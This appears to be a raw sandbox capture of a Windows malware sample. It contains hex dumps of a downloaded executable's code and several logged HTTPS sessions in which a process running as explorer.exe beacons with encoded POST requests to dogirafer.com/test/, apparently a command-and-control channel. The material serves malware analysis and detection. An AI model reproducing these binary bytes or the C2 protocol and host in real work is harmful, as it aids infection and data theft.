                                                                                                                                                                              2024-12-03 16:45:16 UTC1369INData Raw: 00 00 00 70 0c 00 20 5b 00 00 00 00 00 00 00 00 00 00 00 f0 0c 00 70 10 00 00 d0 b8 0b 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b9 0b 00 94 00 00 00 00 00 00 00 00 00 00 00 00 50 0a 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 30 0a 00 00 10 00 00 00 30 0a 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 62 73 73 00 00 00 00 00 00 10 00 00 00 40 0a 00 00 10 00 00 00 40 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 64 61 74 61 00 00 00 c0 01 00 00 50 0a 00 00 c0 01 00 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 60 00 00 00 10 0c 00 00 60 00 00 00 10 0c 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: p [p8Ph.text00 `bss@@.rdataPP@@.data``
                                                                                                                                                                              2024-12-03 16:45:16 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii:
                                                                                                                                                                              2024-12-03 16:45:16 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii:
                                                                                                                                                                              2024-12-03 16:45:16 UTC1369INData Raw: 20 74 09 ff c2 66 39 4c 54 20 75 f7 48 8d 4c 24 20 e8 cd 13 00 00 eb 02 33 c0 48 81 c4 38 02 00 00 c3 cc 48 89 5c 24 08 48 89 7c 24 10 55 48 8d ac 24 60 fd ff ff 48 81 ec a0 03 00 00 48 8d 0d 7b 4a 0c 00 c7 44 24 20 eb 2f 76 e0 48 8d 05 ac 46 0c 00 48 89 4c 24 28 48 89 44 24 30 48 8d 05 53 46 0c 00 48 89 44 24 48 48 8d 05 4f 46 0c 00 48 89 44 24 60 48 8d 05 4b 46 0c 00 48 89 44 24 78 48 8d 05 d7 46 0c 00 48 89 45 90 48 8d 05 3c 46 0c 00 48 89 45 a8 48 8d 05 39 46 0c 00 48 89 45 c0 48 8d 05 36 46 0c 00 48 89 45 d8 48 8d 05 33 46 0c 00 48 89 45 f0 48 8d 05 30 46 0c 00 48 89 45 08 48 8d 05 2d 46 0c 00 48 89 45 20 48 8d 05 32 46 0c 00 48 89 45 38 48 8d 05 2f 46 0c 00 48 89 45 50 48 8d 05 2c 46 0c 00 48 89 45 68 48 8d 05 29 46 0c 00 48 89 85 80 00 00 00 48 8d
                                                                                                                                                                              Data Ascii: tf9LT uHL$ 3H8H\$H|$UH$`HH{JD$ /vHFHL$(HD$0HSFHD$HHOFHD$`HKFHD$xHFHEH<FHEH9FHEH6FHEH3FHEH0FHEH-FHE H2FHE8H/FHEPH,FHEhH)FHH
                                                                                                                                                                              2024-12-03 16:45:16 UTC1369INData Raw: 41 57 48 8d a8 48 fe ff ff 48 81 ec 90 02 00 00 48 8d 05 5f 45 0c 00 c7 44 24 20 3b 64 d2 03 48 89 44 24 28 48 8d 74 24 28 48 8d 05 4e 45 0c 00 c7 44 24 30 7f 27 64 e7 45 33 e4 48 89 44 24 38 45 8b f4 4c 8d 2d f4 bf 0a 00 e8 23 fa ff ff e8 1e fa ff ff 48 89 85 c0 01 00 00 48 85 c0 0f 84 e5 00 00 00 41 8b fc ff c7 66 45 39 64 7d 00 75 f6 41 8b dc 66 44 39 20 74 09 ff c3 66 44 39 24 58 75 f7 8d 14 3b 8d 14 55 02 00 00 00 48 8d 8d c0 01 00 00 e8 1d 0d 00 00 85 c0 0f 84 a8 00 00 00 4c 8b bd c0 01 00 00 8b c3 49 8d 0c 47 03 ff 74 17 49 8b d5 44 8b c7 48 2b d1 8a 04 0a 88 01 48 ff c1 49 83 e8 01 75 f2 33 d2 48 8d 4c 24 40 41 b8 50 02 00 00 49 8b dc e8 c8 59 08 00 48 8d 54 24 40 49 8b cf ff 15 4a 44 0c 00 48 8b f8 48 83 f8 ff 74 4a eb 26 41 8b d4 66 44 39 64 24
                                                                                                                                                                              Data Ascii: AWHHHH_ED$ ;dHD$(Ht$(HNED$0'dE3HD$8EL-#HHAfE9d}uAfD9 tfD9$Xu;UHLIGtIDH+HIu3HL$@APIYHT$@IJDHHtJ&AfD9d$
                                                                                                                                                                              2024-12-03 16:45:16 UTC1369INData Raw: 85 d8 01 00 00 1b c3 53 2b 48 89 95 e0 01 00 00 c7 85 f0 01 00 00 f2 cb 55 df 48 89 95 f8 01 00 00 c7 85 08 02 00 00 4a 47 2d d5 48 89 95 10 02 00 00 c7 85 20 02 00 00 57 12 a2 8a 48 89 95 28 02 00 00 c7 85 38 02 00 00 39 1e f1 72 48 89 95 40 02 00 00 c7 85 50 02 00 00 21 d0 52 45 48 89 95 58 02 00 00 c7 85 68 02 00 00 7a 8e 25 e9 48 89 95 70 02 00 00 c7 85 80 02 00 00 a4 1a 86 d0 48 89 95 88 02 00 00 c7 85 98 02 00 00 14 31 8b 23 48 89 95 a0 02 00 00 c7 85 b0 02 00 00 07 77 19 f5 48 89 95 b8 02 00 00 c7 85 c8 02 00 00 4d 11 46 05 48 89 95 d0 02 00 00 c7 85 e0 02 00 00 02 91 78 2d 48 8d 05 d2 3d 0c 00 48 89 95 e8 02 00 00 48 89 85 f0 02 00 00 48 8d 0d 2d 3f 0c 00 48 8d 05 ae 3d 0c 00 c7 85 f8 02 00 00 df 86 ef 27 48 89 85 08 03 00 00 48 8d 05 a6 3d 0c 00
                                                                                                                                                                              Data Ascii: S+HUHJG-H WH(89rH@P!REHXhz%HpH1#HwHMFHx-H=HHH-?H='HH=
                                                                                                                                                                              2024-12-03 16:45:16 UTC1369INData Raw: 00 00 61 bc 1d 14 48 89 95 48 06 00 00 c7 85 58 06 00 00 cb a6 9c f4 48 89 95 60 06 00 00 c7 85 70 06 00 00 fd 53 ca 1c 48 89 95 78 06 00 00 c7 85 88 06 00 00 8d bf 40 ab 48 89 95 90 06 00 00 c7 85 a0 06 00 00 02 91 d8 59 48 89 95 a8 06 00 00 48 8d 05 1c 3a 0c 00 c7 85 b8 06 00 00 ce d5 eb c9 48 89 85 b0 06 00 00 48 8d 5c 24 28 48 8d 05 07 3a 0c 00 48 89 95 c0 06 00 00 48 89 85 c8 06 00 00 33 ff 48 8d 05 f8 39 0c 00 c7 85 d0 06 00 00 9f 60 3f 3d 48 89 85 e0 06 00 00 48 8d 05 e8 39 0c 00 48 89 85 f8 06 00 00 48 8d 05 ea 39 0c 00 48 89 85 10 07 00 00 48 8d 05 d4 39 0c 00 48 89 85 28 07 00 00 48 89 95 d8 06 00 00 c7 85 e8 06 00 00 9a f6 2b d8 48 89 95 f0 06 00 00 c7 85 00 07 00 00 48 29 27 75 48 89 95 08 07 00 00 c7 85 18 07 00 00 19 9c f3 81 48 89 95 20 07
                                                                                                                                                                              Data Ascii: aHHXH`pSHx@HYHH:HH\$(H:HH3H9`?=HH9HH9HH9H(H+HH)'uHH
                                                                                                                                                                              2024-12-03 16:45:16 UTC1369INData Raw: 00 00 00 4d 85 c0 0f 84 84 00 00 00 48 8b 41 18 48 39 41 10 72 22 48 03 c0 ba 0f 00 00 00 48 3b c2 48 0f 47 d0 48 81 fa c0 03 00 00 77 62 e8 78 00 00 00 83 f8 ff 74 58 49 83 c8 ff 49 ff c0 42 80 3c 06 00 75 f6 48 8b d6 48 8b cf e8 32 01 00 00 48 85 c0 75 3a 48 8b 6f 10 48 83 ca ff 48 ff c2 80 3c 16 00 75 f7 48 8b ce e8 c4 fe ff ff 48 8b 0f 48 89 04 e9 48 8b 07 48 83 3c e8 00 74 10 48 8b 47 08 4c 89 34 e8 48 ff 47 10 33 c0 eb 03 83 c8 ff 48 8b 6c 24 30 48 8b 74 24 38 48 8b 7c 24 40 48 83 c4 20 41 5e c3 cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 48 83 39 00 48 8b f2 48 8b d9 75 1f 48 83 79 08 00 74 1f 83 c8 ff 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 48 83 79 08 00 74 e1 48 85 f6 74 dc 48 8b ee 48 c1 e5 03 48 8b
                                                                                                                                                                              Data Ascii: MHAH9Ar"HH;HGHwbxtXIIB<uHH2Hu:HoHH<uHHHHH<tHGL4HG3Hl$0Ht$8H|$@H A^H\$Hl$Ht$WH H9HHuHytH\$0Hl$8Ht$@H _HytHtHHH
                                                                                                                                                                              2024-12-03 16:45:16 UTC1369INData Raw: 1a 84 d2 74 23 80 fa 5c 75 0b 48 ff c0 48 89 01 80 38 00 74 13 48 ff 01 48 8b 01 8a 10 80 fa 22 75 df 48 ff c0 48 89 01 48 8b 11 80 3a 00 75 03 33 c0 c3 49 2b d0 49 8b c9 48 83 ea 02 e9 3c fd ff ff 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b f2 48 8b f9 48 83 fa 13 76 07 33 c0 e9 6c 01 00 00 48 8b 01 0f be 08 e8 4b 8e 08 00 33 db eb 0e 48 ff 07 48 8b 07 0f be 08 e8 39 8e 08 00 85 c0 75 ee 48 8b 17 80 3a 22 0f 84 06 01 00 00 80 3a 2d 0f 84 f3 00 00 00 80 3a 2f 7e be 80 3a 39 0f 8e e5 00 00 00 80 3a 5b 0f 84 ce 00 00 00 80 3a 66 74 5a 80 3a 6e 74 1b 80 3a 74 74 50 80 3a 7b 75 98 48 8d 56 01 48 8b cf e8 11 01 00 00 e9 fa 00 00 00 41 b8 04 00 00 00 48 8d 0d 1f 0f 0b 00 e8 da 8e 08 00 85 c0 0f 85 dd 00 00 00 48 83 07 04 8d 48 10 e8 3e 55 08 00 48 85 c0
                                                                                                                                                                              Data Ascii: t#\uHH8tHH"uHHH:u3I+IH<H\$Ht$WH HHHv3lHK3HH9uH:":-:/~:9:[:ftZ:nt:ttP:{uHVHAHHH>UH


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              7192.168.2.449918104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:45:20 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hidViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:45:22 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:45:22 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n%2BkFYYFgWjMa8bwpuX6nM9TbB3UIN2pNJb3NHLAYToJ%2Fwrrxq54yC6z25K3rZmyzcb8wQw0BLoBiTDY3jvCUDR%2By55vGxgOWEHIEQCUEaaDDh5DL%2BCuWHyql3TJQI4WW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec506cd4f8a42e7-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2087&min_rtt=2080&rtt_var=794&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1366401&cwnd=241&unsent_bytes=0&cid=e248a7a8eefacf80&ts=1622&x=0"
                                                                                                                                                                              2024-12-03 16:45:22 UTC343INData Raw: 31 35 30 0d 0a 50 79 79 65 51 4d 43 33 32 6f 70 75 59 78 6e 63 6a 47 62 69 67 33 4a 4a 4f 30 33 56 42 69 6e 43 5a 2f 69 31 76 43 48 4c 5a 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6e 49 6b 34 70 66 5a 76 6c 37 46 30 71 43 62 47 35 73 4b 52 47 75 70 4b 73 6f 4d 34 2f 37 45 35 52 48 32 70 4f 36 73 53 6e 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 45 77 42 4f 76 6c 49 42 70 2b 62 72 2f 47 66 48 4d 70 35 73 74 41 35 31 50 66 44 42 78 42 37 45 41 2f 4d 6c 77 4c 4f 49 7a 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 57 51 4a
                                                                                                                                                                              Data Ascii: 150PyyeQMC32opuYxncjGbig3JJO03VBinCZ/i1vCHLZmmcphSGpB6yiJiVjA1nIk4pfZvl7F0qCbG5sKRGupKsoM4/7E5RH2pO6sSnfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcEwBOvlIBp+br/GfHMp5stA51PfDBxB7EA/MlwLOIzMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1WQJ
                                                                                                                                                                              2024-12-03 16:45:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              8192.168.2.449926104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:45:23 UTC412OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hjdViRxTPtzXdZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 360
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:45:23 UTC360OUTData Raw: 4c 47 37 5a 48 5a 37 76 6a 4b 64 72 4e 6c 57 69 33 44 4b 48 6b 7a 55 6c 53 54 50 52 66 58 71 73 4e 36 33 72 7a 32 2b 7a 42 6c 54 6f 34 52 4f 44 30 52 61 6b 6e 4c 32 57 36 30 70 72 57 52 31 66 66 75 71 2f 67 79 42 52 56 76 48 6d 32 4b 4a 77 35 63 44 59 30 6f 4a 74 70 46 68 53 65 32 4a 4d 35 72 66 42 63 56 52 70 53 32 63 53 5a 51 72 49 75 5a 50 4f 4d 54 75 6b 36 43 77 61 4e 36 6c 59 7a 4c 67 6b 2f 56 4f 44 77 36 71 44 61 78 77 62 76 7a 4f 37 57 58 53 71 65 38 68 4f 64 37 53 67 65 48 5a 32 44 75 6d 71 48 48 68 71 6a 75 38 34 70 43 75 48 53 45 73 75 36 30 6c 44 51 67 56 4c 5a 39 36 44 4a 70 76 4c 5a 6a 32 47 4b 7a 50 67 55 6c 54 2b 51 30 45 78 4f 6a 4c 6f 35 6a 45 6a 5a 5a 49 65 6c 73 69 76 77 6f 70 4b 48 70 44 54 76 5a 33 68 59 36 73 71 48 4e 66 78 4c 58 47
                                                                                                                                                                              Data Ascii: LG7ZHZ7vjKdrNlWi3DKHkzUlSTPRfXqsN63rz2+zBlTo4ROD0RaknL2W60prWR1ffuq/gyBRVvHm2KJw5cDY0oJtpFhSe2JM5rfBcVRpS2cSZQrIuZPOMTuk6CwaN6lYzLgk/VODw6qDaxwbvzO7WXSqe8hOd7SgeHZ2DumqHHhqju84pCuHSEsu60lDQgVLZ96DJpvLZj2GKzPgUlT+Q0ExOjLo5jEjZZIelsivwopKHpDTvZ3hY6sqHNfxLXG
                                                                                                                                                                              2024-12-03 16:45:25 UTC783INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:45:24 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3YdMCNRYpIRfCXKhPXi6bhBfVHj0hJL%2F6tTbADEcG%2B3ffxxhhDTXbothgtawGFz603M4RhAELZMnpZCmOmfzdLTghgO58p5SKU7WDOO%2B25ZuCLTbWoFZrzPQ87N7aOjH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec506dfe85d42ea-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2109&min_rtt=1666&rtt_var=1511&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1432&delivery_rate=560353&cwnd=143&unsent_bytes=0&cid=ce72cb35c067b38a&ts=1579&x=0"
                                                                                                                                                                              2024-12-03 16:45:25 UTC138INData Raw: 38 34 0d 0a 4d 79 6d 65 51 73 53 78 33 34 70 6a 59 78 6e 51 67 57 36 73 7a 6e 56 4a 4f 6b 50 66 44 55 36 70 61 50 2b 33 76 69 50 49 4b 52 69 62 6e 6d 58 35 31 32 65 2f 36 76 76 67 75 54 35 6d 4a 67 73 6a 65 35 76 6f 68 31 67 72 5a 37 61 32 74 71 4d 4a 74 5a 44 6a 6d 66 49 35 36 43 6c 56 47 47 5a 46 67 4d 43 6d 4e 6c 41 55 45 77 77 44 42 51 2b 7a 34 4d 6a 49 52 41 33 53 73 6d 68 49 59 4d 31 65 2b 39 42 58 0d 0a
                                                                                                                                                                              Data Ascii: 84MymeQsSx34pjYxnQgW6sznVJOkPfDU6paP+3viPIKRibnmX512e/6vvguT5mJgsje5voh1grZ7a2tqMJtZDjmfI56ClVGGZFgMCmNlAUEwwDBQ+z4MjIRA3SsmhIYM1e+9BX
                                                                                                                                                                              2024-12-03 16:45:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              9192.168.2.449933104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:45:26 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hgdViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:45:28 UTC790INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:45:27 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mYI6mo%2BnZz9BV3PQFbi4nvNpNZhYZ4Go6iVSUO3%2B%2B4ymkStIogVayaOydR%2BgDSpHY61bB65q5FDJOLfHQjMJ0%2B%2Bh5vD8Ca3wZhLESFe1yXa4YRxdnDPfryOJd6Mnl%2BRN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec506f25fb64387-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2554&min_rtt=2526&rtt_var=967&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1155977&cwnd=32&unsent_bytes=0&cid=a868660c4e65bb70&ts=1655&x=0"
                                                                                                                                                                              2024-12-03 16:45:28 UTC343INData Raw: 31 35 30 0d 0a 50 69 6d 61 51 63 43 33 30 49 70 6c 59 42 72 51 68 47 37 70 67 33 46 4b 4f 30 37 52 44 55 36 6c 61 50 79 33 75 43 54 4b 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 42 74 49 6b 41 6a 65 5a 47 4f 69 31 73 6a 44 72 61 2f 74 75 30 4a 75 70 4b 74 6f 38 6c 52 35 53 46 56 48 32 46 4c 36 6f 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 48 45 63 41 31 41 65 72 6e 54 68 73 52 62 62 66 44 65 33 56 68 34 59 5a 47 37 46 4c 5a 44 58 5a 41 69 30 34 39 4e 46 30 41 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4f 50 4a 52 51 5a
                                                                                                                                                                              Data Ascii: 150PimaQcC30IplYBrQhG7pg3FKO07RDU6laPy3uCTKKRib7xuPoA21j4bUizBtIkAjeZGOi1sjDra/tu0JupKto8lR5SFVH2FL6o+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzHEcA1AernThsRbbfDe3Vh4YZG7FLZDXZAi049NF0AcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZOPJRQZ
                                                                                                                                                                              2024-12-03 16:45:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              10192.168.2.449940104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:45:29 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hhdViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:45:31 UTC791INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:45:30 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G%2BD4IGzEkBdE%2BHWCKhJdhtS57%2Ff%2B9462mRgKHG48ZUCLay5ud2n05EESd%2B%2FIrwKFW8JnGjoIGku17DY0TR71ffGeLLqEZx3ukR%2BrmO54oLqsRfppsgVqJc1mVDnsBbVP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec50704da734374-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2587&min_rtt=1835&rtt_var=2193&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=371785&cwnd=218&unsent_bytes=0&cid=9365a87adbf3a869&ts=1603&x=0"
                                                                                                                                                                              2024-12-03 16:45:31 UTC339INData Raw: 31 34 63 0d 0a 4f 53 71 61 51 38 57 7a 30 49 70 68 5a 78 54 61 68 57 57 73 78 6e 52 4c 50 30 7a 51 41 6b 36 76 5a 2f 32 31 74 69 36 41 57 42 2f 53 34 42 4b 4c 73 77 71 79 6b 63 66 54 74 6a 56 72 4a 45 38 6a 66 66 7a 6d 68 31 77 71 41 4c 4c 7a 74 61 45 44 74 35 57 6d 70 61 63 2f 36 79 6c 63 46 47 4a 50 6f 2f 36 61 56 44 46 73 64 55 46 50 51 56 48 2b 70 59 43 4f 52 6e 33 45 39 6a 30 66 4a 5a 30 4b 34 71 38 38 32 67 32 36 2b 76 37 62 52 69 45 6d 73 56 58 63 49 79 50 42 46 73 6b 30 41 4f 75 4d 49 78 30 53 61 4c 37 47 65 44 30 6f 37 6f 52 47 35 31 62 56 5a 78 42 41 67 55 6f 31 4d 31 6c 45 41 37 62 6c 49 75 66 36 58 54 57 4d 49 6e 61 74 56 58 36 63 49 68 51 63 50 79 58 6a 7a 41 68 31 54 71 4e 65 68 73 36 62 33 72 52 4a 4e 4e 62 46 78 76 62 72 50 2f 56 57 51 35
                                                                                                                                                                              Data Ascii: 14cOSqaQ8Wz0IphZxTahWWsxnRLP0zQAk6vZ/21ti6AWB/S4BKLswqykcfTtjVrJE8jffzmh1wqALLztaEDt5Wmpac/6ylcFGJPo/6aVDFsdUFPQVH+pYCORn3E9j0fJZ0K4q882g26+v7bRiEmsVXcIyPBFsk0AOuMIx0SaL7GeD0o7oRG51bVZxBAgUo1M1lEA7blIuf6XTWMInatVX6cIhQcPyXjzAh1TqNehs6b3rRJNNbFxvbrP/VWQ5
